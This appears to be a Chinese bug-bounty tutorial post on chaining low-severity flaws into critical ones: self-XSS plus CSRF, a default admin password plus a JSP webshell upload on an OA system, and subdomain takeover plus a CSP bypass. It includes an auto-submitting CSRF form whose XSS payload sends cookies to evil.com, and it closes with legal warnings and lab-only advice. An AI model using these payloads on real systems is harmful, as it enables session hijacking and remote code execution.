上期回顾:我们学会了怎么把报告写得像"诺贝尔奖申请书"一样漂亮。但如果你手里只有几个"蚊子级"(低危)漏洞怎么办?
本期教你**"合体进化"** :把几个看似鸡肋的低危漏洞,组合成一个让厂商连夜起床修的 **Critical(严重)** 漏洞。🧬
一、 什么是漏洞组合拳?
单一漏洞可能无害,但链式反应是毁灭性的。
| 单独漏洞 | 危害等级 | 组合后 | 危害等级 |
|---|---|---|---|
| Self-XSS (需自己点) | 无危/忽略 | + CSRF (强制别人点) | 中危/高危 |
| 弱口令 (前台登录) | 中危 | + 后台文件上传 | **严重 (Getshell)** |
| 子域名接管 | 低危 | + 主站信任该域名 | **高危 (窃取Cookie)** |
核心逻辑 :入口(Entry) -> 利用(Exploitation) -> 目标(Goal)。
二、 实战 Case 1:Self-XSS + CSRF = 存储型 XSS
这是最经典的组合,也是 SRC 里的"捡钱"套路。
1. 漏洞现状
你发现一个个人资料页的输入框存在 XSS:<script>alert(1)</script>。
问题 :这是 Self-XSS。只有你自己输入、你自己点,才能触发。厂商通常会回复:"无法影响其他用户,忽略。"
2. 寻找 CSRF
你检查修改资料的请求包,发现没有 Token 校验,也没有验证 Referer。
这意味着你可以构造一个 HTML 页面,诱导用户访问,页面自动提交表单修改资料。
3. 组合拳出击
Payload 构造:
html
<body onload="document.forms[0].submit()">
<form action="https://target.com/user/update" method="POST">
<!-- 把 XSS Payload 填入 nickname 字段 -->
<input type="hidden" name="nickname" value="<script>fetch('https://evil.com?cookie='+document.cookie)</script>">
</form>
</body>结果:
-
你把
evil.html发给管理员。 -
管理员打开页面。
-
页面自动提交表单,把管理员的昵称改成了 XSS Payload。
-
管理员刷新个人中心,Cookie 发送到了你的服务器。
-
评级飙升 :从"忽略"直接变成 "高危:存储型 XSS 接管管理员会话"。🎉
三、 实战 Case 2:弱口令 + 后台 Getshell
这是红队最常用的打点手法。
1. 漏洞现状
你通过信息收集,找到了一个老旧的泛微 OA 后台:oa.example.com。
尝试默认口令:admin/admin123,登录成功。
评级 :中危(弱口令)。
2. 寻找利用链
进入后台后,你不看文章管理,直接找系统设置 -> 附件上传 -> 文件类型限制。
你发现可以把 .jsp添加到允许上传的类型列表中。
3. 组合拳出击
-
利用弱口令进入后台。
-
修改配置 :在后台把
.jsp加入允许上传的后缀。 -
上传 Webshell :上传
cmd.jsp。 -
执行命令 :访问
https://oa.example.com/images/cmd.jsp?pwd=xxx。 -
评级飙升 :从"中危"变成 "严重:远程代码执行(RCE)"。厂商会哭着给你发奖金。💰
四、 实战 Case 3:子域名接管 + 信任绕过
利用厂商对子域名的信任机制。
1. 漏洞现状
你发现 static.example.com是一个 CNAME 指向 github.io的域名,但对应的 GitHub 仓库已被删除。
评级 :低危(子域名接管)。
2. 寻找信任机制
你检查主站 www.example.com的 CSP(内容安全策略)或 CORS 配置。
发现 script-src 'self' static.example.com;。
这意味着主站允许加载来自 static.example.com的 JS 脚本。
3. 组合拳出击
-
接管 :你在 GitHub 重建那个仓库,创建了一个
malicious.js。 -
投毒 :在主站某个页面(如评论区)插入
<script src="https://static.example.com/malicious.js"></script>。 -
利用:由于主站信任该域名,你的 JS 顺利执行,可以读取主站 Cookie 或进行 CSRF 操作。
-
评级飙升 :从"低危"变成 "高危:同源策略绕过/账户接管"。
五、 SRC 报告中的"吹牛"技巧
写报告时,不要把漏洞分开写。要把它们串成一个惊心动魄的黑客故事。
报告标题:
【严重】通过弱口令与配置滥用组合拳实现泛微 OA 远程代码执行
描述话术:
攻击者首先利用默认弱口令
admin/admin123突破前台认证(中危)。进入后台后,发现可利用系统配置功能绕过文件上传限制,导致任意文件上传(高危)。
最终组合利用,攻击者可在服务器上执行任意系统命令,控制内网核心资产。
效果:厂商一看就知道你是个高手,奖金翻倍。📈
六、 互动与思考
💬 互动话题:
大家还见过哪些神奇的组合拳?
比如 "短信轰炸 + 逻辑漏洞 = 无限提现"?
或者 "SSRF + Redis = 内网 Getshell"?
欢迎在评论区分享你的"组合技"!🥋
⚠️ 法律红线警示
-
严禁 在真实环境中演练"组合拳"攻击,除非你拥有明确的书面授权。
-
严禁利用 Self-XSS + CSRF 攻击真实用户(如管理员),窃取其 Cookie 或会话。
-
严禁 利用弱口令进入后台后,进行破坏性操作 (删库、改配置)或下载敏感数据。
-
测试原则:
-
所有组合攻击仅在本地靶场(如 Vulhub、自己搭建的虚拟机)中复现。
-
报告中的截图必须对敏感信息进行重度打码。
-
证明"可以利用"即可,切勿实际执行恶意代码。
**组合漏洞是为了展示危害的深度,而不是为了展示破坏的力度。请守住底线,做正义的链式反应。** 🛡️
-
下一期,我们将迎来系列终章:"众测实战与避坑指南"------ 如何在血海中杀出重围?"。想知道怎么挑选高奖金项目吗?敬请期待!🩸